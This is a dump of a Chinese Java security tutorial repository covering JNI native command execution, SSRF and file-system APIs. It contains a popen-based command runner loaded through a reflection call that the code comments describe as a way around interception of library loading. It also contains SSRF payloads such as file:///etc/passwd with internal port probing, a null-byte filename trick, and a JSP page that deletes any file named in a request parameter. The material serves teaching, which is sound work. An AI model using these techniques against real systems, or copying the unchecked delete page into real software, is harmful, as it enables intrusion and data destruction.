115 | #include "com_anbai_sec_cmd_CommandExecution.h"
116 |
117 | using namespace std;
118 |
119 | JNIEXPORT jstring
120 |
121 | JNICALL Java_com_anbai_sec_cmd_CommandExecution_exec
122 | (JNIEnv *env, jclass jclass, jstring str) {
123 |
124 | if (str != NULL) {
125 | jboolean jsCopy;
126 | // 将jstring参数转成char指针
127 | const char *cmd = env->GetStringUTFChars(str, &jsCopy);
128 |
129 | // 使用popen函数执行系统命令
130 | FILE *fd = popen(cmd, "r");
131 |
132 | if (fd != NULL) {
133 | // 返回结果字符串
134 | string result;
135 |
136 | // 定义字符串数组
137 | char buf[128];
138 |
139 | // 读取popen函数的执行结果
140 | while (fgets(buf, sizeof(buf), fd) != NULL) {
141 | // 拼接读取到的结果到result
142 | result +=buf;
143 | }
144 |
145 | // 关闭popen
146 | pclose(fd);
147 |
148 | // 返回命令执行结果给Java
149 | return env->NewStringUTF(result.c_str());
150 | }
151 |
152 | }
153 |
154 | return NULL;
155 | }
156 | ```
157 |
158 | 使用`vim com/anbai/sec/cmd/com_anbai_sec_cmd_CommandExecution.cpp`或编辑器编写好cpp文件。
159 |
160 | 首先切换到我们的C目录:`cd com/anbai/sec/cmd/`然后使用`g++`命令编译成动态链接库,前提是您需要提前装好编译环境如:`gcc/g++`。
161 |
162 | `MacOSX编译`:
163 |
164 | ```bash
165 | g++ -fPIC -I"$JAVA_HOME/include" -I"$JAVA_HOME/include/darwin" -shared -o libcmd.jnilib com_anbai_sec_cmd_CommandExecution.cpp
166 | ```
167 |
168 | `Linux编译:`
169 |
170 | ```bash
171 | g++ -fPIC -I"$JAVA_HOME/include" -I"$JAVA_HOME/include/linux" -shared -o libcmd.so com_anbai_sec_cmd_CommandExecution.cpp
172 | ```
173 |
174 | `Windows编译:`
175 |
176 | 1. `Visual Studio/cl命令`编译dll。
177 | 2. 使用`min-gw/cygwin`安装`gcc/g++`,如: `x86_64-w64-mingw32-g++ -I"%JAVA_HOME%\include" -I"%JAVA_HOME%\include\win32" -shared -o cmd.dll com_anbai_sec_cmd_CommandExecution.cpp`。
178 |
179 | 如依旧无法编译成,可参考:[Java Programming Tutorial Java Native Interface (JNI)](https://www3.ntu.edu.sg/home/ehchua/programming/java/JavaNativeInterface.html),这篇文章讲解了如何在不同的操作系统中使用C/C++来编写JNI的HelloWorld。
180 |
181 | 如果您采用了`C语言`编写(C和C++版本基本没差别,也就在使用`*env`时的参数值一般会不一样)那么请用`gcc`编译,编译完成我们就可以使用这个动态链接库了。正常情况下我们需要`严格按照JNI要求去命名文件名`并且`把链接库放到Java的动态链接库目录`,不然会无法加载。但是这都不是什么大问题我们完全可以通过自定义库名称和路径。
182 |
183 | **`com.anbai.sec.cmd.CommandExecutionTest`示例:**
184 |
185 | ```java
186 | package com.anbai.sec.cmd;
187 |
188 | import java.io.File;
189 | import java.lang.reflect.Method;
190 |
191 | /**
192 | * Creator: yz
193 | * Date: 2019/12/8
194 | */
195 | public class CommandExecutionTest {
196 |
197 | private static final String COMMAND_CLASS_NAME = "com.anbai.sec.cmd.CommandExecution";
198 |
199 | /**
200 | * JDK1.5编译的com.anbai.sec.cmd.CommandExecution类字节码,
201 | * 只有一个public static native String exec(String cmd);的方法
202 | */
203 | private static final byte[] COMMAND_CLASS_BYTES = new byte[]{
204 | -54, -2, -70, -66, 0, 0, 0, 49, 0, 15, 10, 0, 3, 0, 12, 7, 0, 13, 7, 0, 14, 1,
205 | 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100,
206 | 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108,
207 | 101, 1, 0, 4, 101, 120, 101, 99, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97,
208 | 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108,
209 | 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 83, 111, 117, 114,
210 | 99, 101, 70, 105, 108, 101, 1, 0, 21, 67, 111, 109, 109, 97, 110, 100, 69, 120,
211 | 101, 99, 117, 116, 105, 111, 110, 46, 106, 97, 118, 97, 12, 0, 4, 0, 5, 1, 0, 34,
212 | 99, 111, 109, 47, 97, 110, 98, 97, 105, 47, 115, 101, 99, 47, 99, 109, 100, 47, 67,
213 | 111, 109, 109, 97, 110, 100, 69, 120, 101, 99, 117, 116, 105, 111, 110, 1, 0, 16,
214 | 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 0, 33, 0,
215 | 2, 0, 3, 0, 0, 0, 0, 0, 2, 0, 1, 0, 4, 0, 5, 0, 1, 0, 6, 0, 0, 0, 29, 0, 1, 0, 1,
216 | 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 1, 0, 7, 0, 0, 0, 6, 0, 1, 0, 0, 0, 7, 1,
217 | 9, 0, 8, 0, 9, 0, 0, 0, 1, 0, 10, 0, 0, 0, 2, 0, 11
218 | };
219 |
220 | public static void main(String[] args) {
221 | String cmd = "ifconfig";// 定于需要执行的cmd
222 |
223 | try {
224 | ClassLoader loader = new ClassLoader(CommandExecutionTest.class.getClassLoader()) {
225 | @Override
226 | protected Class findClass(String name) throws ClassNotFoundException {
227 | try {
228 | return super.findClass(name);
229 | } catch (ClassNotFoundException e) {
230 | return defineClass(COMMAND_CLASS_NAME, COMMAND_CLASS_BYTES, 0, COMMAND_CLASS_BYTES.length);
231 | }
232 | }
233 | };
234 |
235 | // 测试时候换成自己编译好的lib路径
236 | File libPath = new File("/Users/yz/IdeaProjects/javaweb-sec/javaweb-sec-source/javase/src/main/java/com/anbai/sec/cmd/libcmd.jnilib");
237 |
238 | // load命令执行类
239 | Class commandClass = loader.loadClass("com.anbai.sec.cmd.CommandExecution");
240 |
241 | // 可以用System.load也加载lib也可以用反射ClassLoader加载,如果loadLibrary0
242 | // 也被拦截了可以换java.lang.ClassLoader$NativeLibrary类的load方法。
243 | // System.load("/Users/yz/IdeaProjects/javaweb-sec/javaweb-sec-source/javase/src/main/java/com/anbai/sec/cmd/libcmd.jnilib/libcmd.jnilib");
244 | Method loadLibrary0Method = ClassLoader.class.getDeclaredMethod("loadLibrary0", Class.class, File.class);
245 | loadLibrary0Method.setAccessible(true);
246 | loadLibrary0Method.invoke(loader, commandClass, libPath);
247 |
248 | String content = (String) commandClass.getMethod("exec", String.class).invoke(null, cmd);
249 | System.out.println(content);
250 | } catch (Exception e) {
251 | e.printStackTrace();
252 | }
253 | }
254 |
255 | }
256 | ```
257 |
258 | **`CommandExecutionTest`执行命令演示:**
259 |
260 | 
261 |
262 | 示例代码中的`CommandExecutionTest.java`其实和`load_library.jsp`逻辑差不多,Demo实现了自定义`ClassLoader`重写了`findClass`方法来加载`com.anbai.sec.cmd.CommandExecution`类的字节码并实现调用,然后再通过JNI加载动态链接库并调用了链接库中的命令执行函数。
263 |
264 | ## JNI安全基础总结
265 |
266 | 本章节我们学习了如何通过JNI调用动态链接库实现本地命令执行功能,我们应该深入的认识到通过编写native方法我们可以做几乎任何事(比如不使用Java自带的`FileInputStream`API读文件、不使用`forkAndExec`执行系统命令等)。JNI为我们提供了如此强大的灵活性也为Java的安全性带来了非常大的挑战,所以某些情况下我们不得不考虑如何限制用户调用JNI来提升安全性。
--------------------------------------------------------------------------------
/gitbook/javase/JavaAgent/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AMJIYU/javaweb-sec/68791efd17d0dafd33127da49dc0ed51857ede6b/gitbook/javase/JavaAgent/README.md
--------------------------------------------------------------------------------
/gitbook/javase/JavaByteCode/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AMJIYU/javaweb-sec/68791efd17d0dafd33127da49dc0ed51857ede6b/gitbook/javase/JavaByteCode/README.md
--------------------------------------------------------------------------------
/gitbook/javase/JavaConcurrency/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AMJIYU/javaweb-sec/68791efd17d0dafd33127da49dc0ed51857ede6b/gitbook/javase/JavaConcurrency/README.md
--------------------------------------------------------------------------------
/gitbook/javase/JavaDeserialization/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AMJIYU/javaweb-sec/68791efd17d0dafd33127da49dc0ed51857ede6b/gitbook/javase/JavaDeserialization/README.md
--------------------------------------------------------------------------------
/gitbook/javase/JavaEncrypt/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AMJIYU/javaweb-sec/68791efd17d0dafd33127da49dc0ed51857ede6b/gitbook/javase/JavaEncrypt/README.md
--------------------------------------------------------------------------------
/gitbook/javase/README.md:
--------------------------------------------------------------------------------
1 | # Java SE
2 |
3 | Java语言涉及范围甚广,知识体系更是环环相扣浩瀚无边。没有基础,何来进阶!本章节整理了一些Java SE部分与安全相关的基础知识供初学者学习进阶。
4 |
5 |
--------------------------------------------------------------------------------
/gitbook/javase/URLConnection/README.md:
--------------------------------------------------------------------------------
1 | # URLConnection
2 |
3 | 在java中,Java抽象出来了一个`URLConnection`类,它用来表示应用程序以及与URL建立通信连接的所有类的超类,通过`URL`类中的`openConnection`方法获取到`URLConnection`的类对象。
4 |
5 | Java中URLConnection支持的协议可以在`sun.net.www.protocol`看到。
6 |
7 | 
8 |
9 | 由上图可以看到,支持的协议有以下几个(当前jdk版本:1.7.0_80):
10 |
11 | ```
12 | file ftp mailto http https jar netdoc gopher
13 | ```
14 |
15 | 虽然看到有`gopher`,但是`gopher`实际在jdk8版本以后被阉割了,jdk7高版本虽然存在,但是需要设置具体可以看
16 | `https://bugzilla.redhat.com/show_bug.cgi?id=865541`以及`http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/8067bdeb4e31`
17 | 其中每个协议都有一个`Handle`,`Handle`定义了这个协议如何去打开一个连接。
18 |
19 | 我们来使用URL发起一个简单的请求
20 |
21 | ```
22 | public class URLConnectionDemo {
23 |
24 | public static void main(String[] args) throws IOException {
25 | URL url = new URL("https://www.baidu.com");
26 |
27 | // 打开和url之间的连接
28 | URLConnection connection = url.openConnection();
29 |
30 | // 设置请求参数
31 | connection.setRequestProperty("user-agent", "javasec");
32 | connection.setConnectTimeout(1000);
33 | connection.setReadTimeout(1000);
34 | ...
35 |
36 | // 建立实际连接
37 | connection.connect();
38 |
39 | // 获取响应头字段信息列表
40 | connection.getHeaderFields();
41 |
42 | // 获取URL响应
43 | connection.getInputStream();
44 |
45 | StringBuilder response = new StringBuilder();
46 | BufferedReader in = new BufferedReader(
47 | new InputStreamReader(connection.getInputStream()));
48 | String line;
49 |
50 | while ((line = in.readLine()) != null) {
51 | response.append("/n").append(line);
52 | }
53 |
54 | System.out.print(response.toString());
55 | }
56 | }
57 | ```
58 |
59 | 大概描述一下这个过程,首先使用URL建立一个对象,调用`url`对象中的`openConnection`来获取一个`URLConnection`的实例,然后通过在`URLConnection`设置各种请求参数以及一些配置,在使用其中的`connect`方法来发起请求,然后在调用`getInputStream`来获请求的响应流。
60 | 这是一个基本的请求到响应的过程。
61 |
62 | ## SSRF
63 | >SSRF(Server-side Request Forge, 服务端请求伪造)。
64 | 由攻击者构造的攻击链接传给服务端执行造成的漏洞,一般用来在外网探测或攻击内网服务。
65 |
66 | SSRF漏洞形成的原因大部分是因为服务端提供了可以从其他服务器获取资源的功能,然而并没有对用户的输入以及发起请求的url进行过滤&限制,从而导致了ssrf的漏洞。
67 |
68 | 通常ssrf容易出现的功能点如下面几种场景
69 |
70 | - 抓取用户输入图片的地址并且本地化存储
71 | - 从远程服务器请求资源
72 | - 对外发起网络请求
73 | - ……
74 |
75 |
76 |
77 | 黑客在使用ssrf漏洞的时候,大部分是用来读取文件内容或者对内网服务端口探测,或者在域环境情况下且是win主机下进行ntlmrealy攻击。
78 | ```
79 | URL url = new URL(url);
80 | URLConnection connection = url.openConnection();
81 | connection.connect();
82 | connection.getInputStream();
83 | StringBuilder response = new StringBuilder();
84 | BufferedReader in = new BufferedReader(
85 | new InputStreamReader(connection.getInputStream()));
86 | String line;
87 |
88 | while ((line = in.readLine()) != null) {
89 | response.append("/n").append(line);
90 | }
91 |
92 | System.out.print(response.toString());
93 | ```
94 | 比如上面代码中的`url`可控,那么将url参数传入为`file:///etc/passwd`
95 |
96 | ```
97 | URL url = new URL("file:///etc/passwd");
98 | URLConnection connection = url.openConnection();
99 | connection.connect();
100 | ...
101 | ```
102 | 以上代码运行以后则会读取本地`/etc/passwd`文件的内容。
103 |
104 | 
105 |
106 | 但是如果上述代码中将`url.openConnection()`返回的对象强转为`HttpURLConnection`,则会抛出如下异常
107 | ```
108 | Exception in thread "main" java.lang.ClassCastException: sun.net.www.protocol.file.FileURLConnection cannot be cast to java.net.HttpURLConnection
109 | ```
110 | 由此看来,ssrf漏洞也对使用不同类发起的url请求也是有所区别的,如果是`URLConnection|URL`发起的请求,那么对于上文中所提到的所有`protocol`都支持,但是如果经过二次包装或者其他的一些类发出的请求,比如
111 | ```
112 | HttpURLConnection
113 | HttpClient
114 | Request
115 | okhttp
116 | ……
117 | ```
118 | 那么只支持发起`http|https`协议,否则会抛出异常。
119 |
120 | 如果传入的是`http://192.168.xx.xx:80`,且`192.168.xx.xx`的`80`端口存在的,则会将其网页源码输出出来
121 |
122 | 
123 |
124 | 但如果是非web端口的服务,则会爆出`Invalid Http response` 或`Connection reset`异常。如果能将此异常抛出来,那么就可以对内网所有服务端口进行探测。
125 |
126 | java中默认对(http|https)做了一些事情,比如:
127 | - 默认启用了透明NTLM认证
128 | - 默认跟随跳转
129 |
130 | 关于NTLM认证的过程这边不在复述,大家可以看该文章[《Ghidra 从 XXE 到 RCE》](https://xlab.tencent.com/cn/2019/03/18/ghidra-from-xxe-to-rce/)
131 | 默认跟随跳转这其中有一个坑点,就是
132 |
133 | 
134 |
135 | 它会对跟随跳转的url进行协议判断,所以Java的SSRF漏洞利用方式整体比较有限。
136 |
137 | - 利用file协议读取文件内容(仅限使用`URLConnection|URL`发起的请求)
138 | - 利用http 进行内网web服务端口探测
139 | - 利用http 进行内网非web服务端口探测(如果将异常抛出来的情况下)
140 | - 利用http进行ntlmrelay攻击(仅限`HttpURLConnection`或者二次包装`HttpURLConnection`并未复写`AuthenticationInfo`方法的对象)
141 |
142 | 对于防御ssrf漏洞的攻击,不单单要对传入的协议进行判断过滤,也要对其中访问的地址进行限制过滤。
143 |
--------------------------------------------------------------------------------
/gitbook/javase/XXE/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AMJIYU/javaweb-sec/68791efd17d0dafd33127da49dc0ed51857ede6b/gitbook/javase/XXE/README.md
--------------------------------------------------------------------------------
/gitbook/javaweb/README.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AMJIYU/javaweb-sec/68791efd17d0dafd33127da49dc0ed51857ede6b/gitbook/javaweb/README.md
--------------------------------------------------------------------------------
/gitbook/startup.sh:
--------------------------------------------------------------------------------
1 | GITBOOK_DIR=/data/javasec
2 | cd $GITBOOK_DIR
3 | gitbook install
4 | gitbook build
5 | nohup gitbook serve --port 8080 & >$GITBOOK_DIR/gitbook.log
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/pom.xml:
--------------------------------------------------------------------------------
1 |
2 |
5 |
6 |
7 | javaweb-sec-source
8 | com.anbai
9 | 1.0.0
10 |
11 |
12 | 4.0.0
13 | javase
14 | war
15 |
16 |
17 |
18 |
19 | javax.servlet
20 | javax.servlet-api
21 | 3.1.0
22 | provided
23 |
24 |
25 |
26 | javax.servlet.jsp
27 | javax.servlet.jsp-api
28 | 2.3.3
29 | provided
30 |
31 |
32 |
33 | commons-io
34 | commons-io
35 | 2.6
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 | org.apache.maven.plugins
44 | maven-compiler-plugin
45 |
46 | 7
47 | 7
48 |
49 |
50 |
51 |
52 |
53 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/cmd/CommandExecution.java:
--------------------------------------------------------------------------------
1 | //package com.anbai.sec.cmd;
2 | //
3 | ///**
4 | // * 本地命令执行类
5 | // * Creator: yz
6 | // * Date: 2019/12/6
7 | // */
8 | //public class CommandExecution {
9 | //
10 | // public static native String exec(String cmd);
11 | //
12 | //}
13 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/cmd/CommandExecutionTest.java:
--------------------------------------------------------------------------------
1 | package com.anbai.sec.cmd;
2 |
3 | import java.io.File;
4 | import java.lang.reflect.Method;
5 |
6 | /**
7 | * Creator: yz
8 | * Date: 2019/12/8
9 | */
10 | public class CommandExecutionTest {
11 |
12 | private static final String COMMAND_CLASS_NAME = "com.anbai.sec.cmd.CommandExecution";
13 |
14 | /**
15 | * JDK1.5编译的com.anbai.sec.cmd.CommandExecution类字节码,
16 | * 只有一个public static native String exec(String cmd);的方法
17 | */
18 | private static final byte[] COMMAND_CLASS_BYTES = new byte[]{
19 | -54, -2, -70, -66, 0, 0, 0, 49, 0, 15, 10, 0, 3, 0, 12, 7, 0, 13, 7, 0, 14, 1,
20 | 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100,
21 | 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108,
22 | 101, 1, 0, 4, 101, 120, 101, 99, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97,
23 | 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108,
24 | 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 10, 83, 111, 117, 114,
25 | 99, 101, 70, 105, 108, 101, 1, 0, 21, 67, 111, 109, 109, 97, 110, 100, 69, 120,
26 | 101, 99, 117, 116, 105, 111, 110, 46, 106, 97, 118, 97, 12, 0, 4, 0, 5, 1, 0, 34,
27 | 99, 111, 109, 47, 97, 110, 98, 97, 105, 47, 115, 101, 99, 47, 99, 109, 100, 47, 67,
28 | 111, 109, 109, 97, 110, 100, 69, 120, 101, 99, 117, 116, 105, 111, 110, 1, 0, 16,
29 | 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 0, 33, 0,
30 | 2, 0, 3, 0, 0, 0, 0, 0, 2, 0, 1, 0, 4, 0, 5, 0, 1, 0, 6, 0, 0, 0, 29, 0, 1, 0, 1,
31 | 0, 0, 0, 5, 42, -73, 0, 1, -79, 0, 0, 0, 1, 0, 7, 0, 0, 0, 6, 0, 1, 0, 0, 0, 7, 1,
32 | 9, 0, 8, 0, 9, 0, 0, 0, 1, 0, 10, 0, 0, 0, 2, 0, 11
33 | };
34 |
35 | public static void main(String[] args) {
36 | String cmd = "ls -la";// 定于需要执行的cmd
37 |
38 | try {
39 | ClassLoader loader = new ClassLoader(CommandExecutionTest.class.getClassLoader()) {
40 | @Override
41 | protected Class findClass(String name) throws ClassNotFoundException {
42 | try {
43 | return super.findClass(name);
44 | } catch (ClassNotFoundException e) {
45 | return defineClass(COMMAND_CLASS_NAME, COMMAND_CLASS_BYTES, 0, COMMAND_CLASS_BYTES.length);
46 | }
47 | }
48 | };
49 |
50 | // 测试时候换成自己编译好的lib路径
51 | File libPath = new File("/Users/yz/IdeaProjects/javaweb-sec/javaweb-sec-source/javase/src/main/java/com/anbai/sec/cmd/libcmd.jnilib");
52 |
53 | // load命令执行类
54 | Class commandClass = loader.loadClass("com.anbai.sec.cmd.CommandExecution");
55 |
56 | // 可以用System.load也加载lib也可以用反射ClassLoader加载,如果loadLibrary0
57 | // 也被拦截了可以换java.lang.ClassLoader$NativeLibrary类的load方法。
58 | // System.load("/Users/yz/IdeaProjects/javaweb-sec/javaweb-sec-source/javase/src/main/java/com/anbai/sec/cmd/libcmd.jnilib/libcmd.jnilib");
59 | Method loadLibrary0Method = ClassLoader.class.getDeclaredMethod("loadLibrary0", Class.class, File.class);
60 | loadLibrary0Method.setAccessible(true);
61 | loadLibrary0Method.invoke(loader, commandClass, libPath);
62 |
63 | String content = (String) commandClass.getMethod("exec", String.class).invoke(null, cmd);
64 | System.out.println(content);
65 | } catch (Exception e) {
66 | e.printStackTrace();
67 | }
68 | }
69 |
70 | }
71 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/filesystem/FileInputStreamDemo.java:
--------------------------------------------------------------------------------
1 | package com.anbai.sec.filesystem;
2 |
3 | import java.io.*;
4 |
5 | /**
6 | * Creator: yz
7 | * Date: 2019/12/4
8 | */
9 | public class FileInputStreamDemo {
10 |
11 | public static void main(String[] args) throws IOException {
12 | File file = new File("/etc/passwd");
13 |
14 | // 打开文件对象并创建文件输入流
15 | FileInputStream fis = new FileInputStream(file);
16 |
17 | // 定义每次输入流读取到的字节数对象
18 | int a = 0;
19 |
20 | // 定义缓冲区大小
21 | byte[] bytes = new byte[1024];
22 |
23 | // 创建二进制输出流对象
24 | ByteArrayOutputStream out = new ByteArrayOutputStream();
25 |
26 | // 循环读取文件内容
27 | while ((a = fis.read(bytes)) != -1) {
28 | // 截取缓冲区数组中的内容,(bytes, 0, a)其中的0表示从bytes数组的
29 | // 下标0开始截取,a表示输入流read到的字节数。
30 | out.write(bytes, 0, a);
31 | }
32 |
33 | System.out.println(out.toString());
34 | }
35 |
36 | }
37 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/filesystem/FileNullBytes.java:
--------------------------------------------------------------------------------
1 | package com.anbai.sec.filesystem;
2 |
3 | import java.io.File;
4 | import java.io.FileOutputStream;
5 | import java.io.IOException;
6 |
7 | /**
8 | * @author yz
9 | */
10 | public class FileNullBytes {
11 |
12 | public static void main(String[] args) {
13 | try {
14 | String fileName = "/tmp/null-bytes.txt\u0000.jpg";
15 | FileOutputStream fos = new FileOutputStream(new File(fileName));
16 | fos.write("Test".getBytes());
17 | fos.flush();
18 | fos.close();
19 | } catch (IOException e) {
20 | e.printStackTrace();
21 | }
22 | }
23 |
24 | }
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/filesystem/FileOutputStreamDemo.java:
--------------------------------------------------------------------------------
1 | package com.anbai.sec.filesystem;
2 |
3 | import java.io.File;
4 | import java.io.FileOutputStream;
5 | import java.io.IOException;
6 |
7 | /**
8 | * Creator: yz
9 | * Date: 2019/12/4
10 | */
11 | public class FileOutputStreamDemo {
12 |
13 | public static void main(String[] args) throws IOException {
14 | // 定义写入文件路径
15 | File file = new File("/tmp/1.txt");
16 |
17 | // 定义待写入文件内容
18 | String content = "Hello World.";
19 |
20 | // 创建FileOutputStream对象
21 | FileOutputStream fos = new FileOutputStream(file);
22 |
23 | // 写入内容二进制到文件
24 | fos.write(content.getBytes());
25 | fos.flush();
26 | fos.close();
27 | }
28 |
29 | }
30 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/filesystem/FilesReadDemo.java:
--------------------------------------------------------------------------------
1 | package com.anbai.sec.filesystem;
2 |
3 | import java.io.IOException;
4 | import java.nio.file.Files;
5 | import java.nio.file.Path;
6 | import java.nio.file.Paths;
7 |
8 | /**
9 | * Creator: yz
10 | * Date: 2019/12/4
11 | */
12 | public class FilesReadDemo {
13 |
14 | public static void main(String[] args) {
15 | // 通过File对象定义读取的文件路径
16 | // File file = new File("/etc/passwd");
17 | // Path path1 = file.toPath();
18 |
19 | // 定义读取的文件路径
20 | Path path = Paths.get("/etc/passwd");
21 |
22 | try {
23 | byte[] bytes = Files.readAllBytes(path);
24 | System.out.println(new String(bytes));
25 | } catch (IOException e) {
26 | e.printStackTrace();
27 | }
28 | }
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/filesystem/FilesWriteDemo.java:
--------------------------------------------------------------------------------
1 | package com.anbai.sec.filesystem;
2 |
3 | import java.io.IOException;
4 | import java.nio.file.Files;
5 | import java.nio.file.Path;
6 | import java.nio.file.Paths;
7 |
8 | /**
9 | * Creator: yz
10 | * Date: 2019/12/4
11 | */
12 | public class FilesWriteDemo {
13 |
14 | public static void main(String[] args) {
15 | // 通过File对象定义读取的文件路径
16 | // File file = new File("/etc/passwd");
17 | // Path path1 = file.toPath();
18 |
19 | // 定义读取的文件路径
20 | Path path = Paths.get("/tmp/test.txt");
21 |
22 | // 定义待写入文件内容
23 | String content = "Hello World.";
24 |
25 | try {
26 | // 写入内容二进制到文件
27 | Files.write(path, content.getBytes());
28 | } catch (IOException e) {
29 | e.printStackTrace();
30 | }
31 | }
32 |
33 | }
34 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/filesystem/RandomAccessReadFileDemo.java:
--------------------------------------------------------------------------------
1 | package com.anbai.sec.filesystem;
2 |
3 | import java.io.*;
4 |
5 | /**
6 | * Creator: yz
7 | * Date: 2019/12/4
8 | */
9 | public class RandomAccessReadFileDemo {
10 |
11 | public static void main(String[] args) {
12 | File file = new File("/etc/passwd");
13 |
14 | try {
15 | // 创建RandomAccessFile对象,r表示以只读模式打开文件,一共有:r(只读)、rw(读写)、
16 | // rws(读写内容同步)、rwd(读写内容或元数据同步)四种模式。
17 | RandomAccessFile raf = new RandomAccessFile(file, "r");
18 |
19 | // 定义每次输入流读取到的字节数对象
20 | int a = 0;
21 |
22 | // 定义缓冲区大小
23 | byte[] bytes = new byte[1024];
24 |
25 | // 创建二进制输出流对象
26 | ByteArrayOutputStream out = new ByteArrayOutputStream();
27 |
28 | // 循环读取文件内容
29 | while ((a = raf.read(bytes)) != -1) {
30 | // 截取缓冲区数组中的内容,(bytes, 0, a)其中的0表示从bytes数组的
31 | // 下标0开始截取,a表示输入流read到的字节数。
32 | out.write(bytes, 0, a);
33 | }
34 |
35 | System.out.println(out.toString());
36 | } catch (IOException e) {
37 | e.printStackTrace();
38 | }
39 | }
40 |
41 | }
42 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/filesystem/RandomAccessWriteFileDemo.java:
--------------------------------------------------------------------------------
1 | package com.anbai.sec.filesystem;
2 |
3 | import java.io.File;
4 | import java.io.IOException;
5 | import java.io.RandomAccessFile;
6 |
7 | /**
8 | * Creator: yz
9 | * Date: 2019/12/4
10 | */
11 | public class RandomAccessWriteFileDemo {
12 |
13 | public static void main(String[] args) {
14 | File file = new File("/tmp/test.txt");
15 |
16 | // 定义待写入文件内容
17 | String content = "Hello World.";
18 |
19 | try {
20 | // 创建RandomAccessFile对象,rw表示以读写模式打开文件,一共有:r(只读)、rw(读写)、
21 | // rws(读写内容同步)、rwd(读写内容或元数据同步)四种模式。
22 | RandomAccessFile raf = new RandomAccessFile(file, "rw");
23 |
24 | // 写入内容二进制到文件
25 | raf.write(content.getBytes());
26 | raf.close();
27 | } catch (IOException e) {
28 | e.printStackTrace();
29 | }
30 | }
31 |
32 | }
33 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/java/com/anbai/sec/filesystem/URLConnectionDemo.java:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright sky 2019-12-07 Email:sky@03sec.com.
3 | *
4 | * Licensed under the Apache License, Version 2.0 (the "License");
5 | * you may not use this file except in compliance with the License.
6 | * You may obtain a copy of the License at
7 | *
8 | * http://www.apache.org/licenses/LICENSE-2.0
9 | *
10 | * Unless required by applicable law or agreed to in writing, software
11 | * distributed under the License is distributed on an "AS IS" BASIS,
12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13 | * See the License for the specific language governing permissions and
14 | * limitations under the License.
15 | */
16 | package com.anbai.sec.filesystem;
17 |
18 | import java.io.BufferedReader;
19 | import java.io.IOException;
20 | import java.io.InputStreamReader;
21 | import java.net.HttpURLConnection;
22 | import java.net.JarURLConnection;
23 | import java.net.URL;
24 | import java.net.URLConnection;
25 | import java.util.jar.Attributes;
26 |
27 | /**
28 | * @author sky
29 | */
30 | public class URLConnectionDemo {
31 |
32 | public static void main(String[] args) throws IOException {
33 | URL url = new URL("file:///etc/passwd");
34 |
35 | HttpURLConnection connection = (HttpURLConnection) url.openConnection();
36 |
37 | connection.connect();
38 |
39 | connection.getInputStream();
40 |
41 | StringBuilder response = new StringBuilder();
42 | BufferedReader in = new BufferedReader(
43 | new InputStreamReader(connection.getInputStream()));
44 | String line;
45 |
46 | while ((line = in.readLine()) != null) {
47 | response.append("/n").append(line);
48 | }
49 |
50 | System.out.print(response.toString());
51 | }
52 | }
53 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/WEB-INF/web.xml:
--------------------------------------------------------------------------------
1 |
4 |
5 |
6 | Archetype Created Web Application
7 |
8 |
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/file-delete.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%@ page import="java.io.File" %>
3 | <%
4 | String fileName = request.getParameter("file");
5 |
6 | if (fileName != null) {
7 | // 创建文件对象
8 | File file = new File(fileName);
9 |
10 | if (file.exists()) {
11 | file.delete();// 删除文件
12 |
13 | out.println(fileName + "删除成功!");
14 | } else {
15 | out.println("文件不存在!");
16 | }
17 | }
18 | %>
--------------------------------------------------------------------------------
/javaweb-sec-source/javase/src/main/webapp/file-list-with-check.jsp:
--------------------------------------------------------------------------------
1 | <%@ page import="java.io.File" %><%--
2 | Created by IntelliJ IDEA.
3 | User: yz
4 | Date: 2019/12/4
5 | Time: 6:08 下午
6 | To change this template use File | Settings | File Templates.
7 | --%>
8 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
